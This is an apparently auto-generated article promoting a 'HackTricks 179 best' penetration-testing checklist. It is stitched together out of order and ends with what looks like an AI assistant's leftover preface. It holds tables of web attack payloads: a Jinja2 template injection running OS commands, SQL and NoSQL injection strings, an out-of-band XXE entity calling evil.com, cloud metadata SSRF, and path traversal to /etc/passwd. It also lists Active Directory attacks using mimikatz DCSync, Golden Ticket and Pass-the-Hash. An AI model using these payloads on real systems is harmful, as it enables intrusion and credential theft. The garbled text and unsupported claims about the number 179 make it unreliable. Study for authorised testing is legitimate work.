Blind SQLi (time-based)
NoSQL Injection (MongoDB)
Command injection (OS)
SSTI (Server-Side Template Injection)
XSS (Stored, Reflected, DOM)
CSRF testing
IDOR / Insecure Direct Object Reference
Authentication bypass (logic flaws)
Session fixation and session hijacking
File upload vulnerabilities (unrestricted)
Insecure deserialization
SSRF (Server-Side Request Forgery)
Rate limiting abuse / brute-force
Business logic flaws
Clickjacking vulnerability check
Remote file inclusion (RFI/LFI)
XML External Entity (XXE)
Cache poisoning / HTTP request smuggling
OAuth & SSO misconfigurations
| # | Trick | Example / Payload |
|---|-------|--------------------|
| 61 | SSTI (Jinja2) | config.__class__.__init__.__globals__['os'].popen('id').read() |
| 62 | SQLi UNION extract DB | ' UNION SELECT @@version,user(),database() -- - |
| 63 | NoSQLi (MongoDB) | '$ne': '' or ';return true;var foo=' |
| 64 | GraphQL introspection | __schematypesname,fieldsname |
| 65 | JWT none algorithm | Change alg to none, remove signature |
| 66 | XXE (out-of-band) | <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://evil.com/xxe"> %xxe;]> |
| 67 | SSRF to internal metadata | http://169.254.169.254/latest/meta-data/ |
| 68 | LFI to RCE (PHP) | php://filter/convert.base64-encode/resource=index.php |
| 69 | Path traversal | ....//....//....//etc/passwd |
| 70 | Open redirect | ?redirect=https://evil.com |
| ... | ... | ... |
| 90 | CSP bypass (unsafe-inline) | ?name=<script>alert(1)</script> |
For Windows environments, HackTricks is famous for its detailed breakdown of "Potato" attacks (Hot Potato, Rotten Potato, Juicy Potato).
You might ask: Why specifically 179?
The number is not magical; it represents the critical mass of techniques required to pass the OSCP exam and succeed in 80% of real-world internal pentests. The "HackTricks 179 best" acts as a checklist. If you have run these 179 checks and found nothing, you are likely facing a highly secured environment (or you missed a blind spot).
The cybersecurity community frequently ranks HackTricks as the #1 go-to resource for several reasons:
| # | Trick | Command / Tool |
|---|-------|----------------|
| 91 | BloodHound collection | SharpHound.exe -c All |
| 92 | ASREPRoast | GetNPUsers.py domain.com/user -dc-ip |
| 93 | Kerberoast | GetUserSPNs.py domain.com/user -dc-ip -request |
| 94 | Pass-the-Hash | xfreerdp /u:user /pth:hash /v:target |
| 95 | DCSync | mimikatz "lsadump::dcsync /user:krbtgt" |
| 96 | Golden Ticket | mimikatz "kerberos::golden /user:Administrator /domain:..." |
| 97 | Silver Ticket | For CIFS, HOST, HTTP services |
| 98 | SCF file attack on share | Write .scf with icon path to UNC |
| 99 | GPO abuse | gpresult /r → modify startup scripts |
| 100 | AD ACL misconfig | Find-InterestingDomainAcl (PowerView) |
| ... | ... | ... |
| 110 | Shadow Credentials (Whitespook) | pyWhisker.py --target computer$ | hacktricks 179 best
The search for "hacktricks 179 best" is more than just a quest for a text file; it is a search for efficiency. In a penetration test, time is money. You cannot brute force every port or read every log.
You need the 179 best checks: the ones that find the exposed id_rsa key, the writable /etc/passwd, or the misconfigured Kubernetes RBAC.
Go to HackTricks now. Find the 179 commands. Practice them until they become muscle memory. Whether you are prepping for the OSCP, hunting for bounties, or defending a corporate network, these 179 tricks will be the sharpest tools in your arsenal.
Remember: Hackers don't break in because they know 10,000 tricks. They break in because they know the right 179 tricks. HackTricks 179 best is your shortcut to that expertise.
Disclaimer: This article is for educational purposes only. Only use these techniques on systems you own or have explicit permission to test.
Since "179" is not a standard chapter number in the official HackTricks book (which is organized by technology like Linux, Windows, Cloud, etc.), I will provide a comprehensive write-up on what HackTricks is, why it is considered the "best" resource for security professionals, and highlight some of the specific techniques that are often cited as "best" or "top-tier" (which might correspond to high-ranking entries on bookmark lists).
Here is a write-up on the topic.